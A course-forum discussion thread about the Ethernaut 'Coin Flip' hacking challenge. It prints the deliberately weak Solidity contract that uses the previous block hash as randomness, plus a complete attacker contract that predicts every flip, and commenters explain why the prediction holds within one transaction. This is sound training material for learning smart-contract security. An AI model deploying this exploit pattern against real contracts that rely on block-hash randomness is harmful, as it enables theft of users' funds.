### DISCUSSION TITLE
Coin Flip - The Ethernaut OpenZeppelin game

### DISCUSSION THREAD

**Discussion by vascofcd** [Cyfrin/foundry-full-course-cu#1502] [General]
I'm playing the Ethernaut Openzeppelin hacking game (suggested in lesson 15) and I came across with the following thought:
First, you can go to the site Ethernaut Openzeppelin and check the challenge, but basically, the contract to exploit is below and we have to guess the correct outcome 10 times in a row:

```
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

contract CoinFlip {

  uint256 public consecutiveWins;
  uint256 lastHash;
  uint256 FACTOR = 57896044618658097711785492504343953926634992332820282019728792003956564819968;

  constructor() {
    consecutiveWins = 0;
  }

  function flip(bool _guess) public returns (bool) {
    uint256 blockValue = uint256(blockhash(block.number - 1));

    if (lastHash == blockValue) {
      revert();
    }

    lastHash = blockValue;
    uint256 coinFlip = blockValue / FACTOR;
    bool side = coinFlip == 1 ? true : false;

    if (side == _guess) {
      consecutiveWins++;
      return true;
    } else {
      consecutiveWins = 0;
      return false;
    }
  }
}
```

And the solution is to deploy a contract to interact with previous contract to get the right answer, like this contract:
```
contract HackCoinFlip{

    using SafeMath for uint256;
    CoinFlip public coinFlipContract;
    uint256 FACTOR = 57896044618658097711785492504343953926634992332820282019728792003956564819968;

    constructor(address _coinFlipContract) public{
        coinFlipContract = CoinFlip(_coinFlipContract);
    }
	
    function makeGuess() public {

        uint256 blockValue = uint256(blockhash(block.number.sub(1)));
        uint256 coinFlip = blockValue.div(FACTOR);
        bool guess = coinFlip == 1 ? true : false;

        coinFlipContract.flip(guess);
    }
}
```
To sum up, the random number is being generated from the block hash previously mined block. So we can mimic the exact calculation of the hash of the  previously mined block to generate the random number that we know this function is using.

Now what is bugging me is my thought process, below with steps:
1. We call HackCoinFlip, makeGuess()
2. makeGuess() determines the blockValue of the previous block
3. makeGuess() calls CoinFlip flip() with hacked guess determined in HackCoinFlip
(now heres my confusion)
4. flip() determines again (?) the blockValue of the previous block 
5. and finally checks if side is correctly side

My question centers on the interval between steps 2 and 4. Given that new blocks are constantly being mined, is there a risk that the block hash used in step 4 (by CoinFlip) could be different from the one used in step 2 (by HackCoinFlip), thereby affecting the reliability of this exploit? Intuitively, it seems like the exploit should fail if the  blockchain progresses between these steps, yet the strategy is purportedly effective. Can anyone shed light on why the block hash remains consistent through this process, ensuring the exploit's success?

**Comment by EngrPips** [comment]
This seem like something really interesting to dive into when i have some time on my hand

**Comment by ghost** [comment]
If I understood correctly - you're wondering why the block number doesn't change between the call to `makeGuess` and the call to `flip`.

In my opinion is because this is one transaction that involves these calls, these are not two independent transactions that could be included in different order or in different blocks and regardless in which block the tx included in, we always access the block hash of the previous block.

**Reply by vascofcd** [reply]
Yes, my initial thought was that due to the mining of blocks happening between `makeGuess `and `flip`, it's challenging to ascertain the number of the previous block, given that they're in the process of being created. But I guess, this transaction occurs in one go, they are not independent as you said.

**Comment by EngrPips** [comment]
Awesome conversation here, I am learning a lot
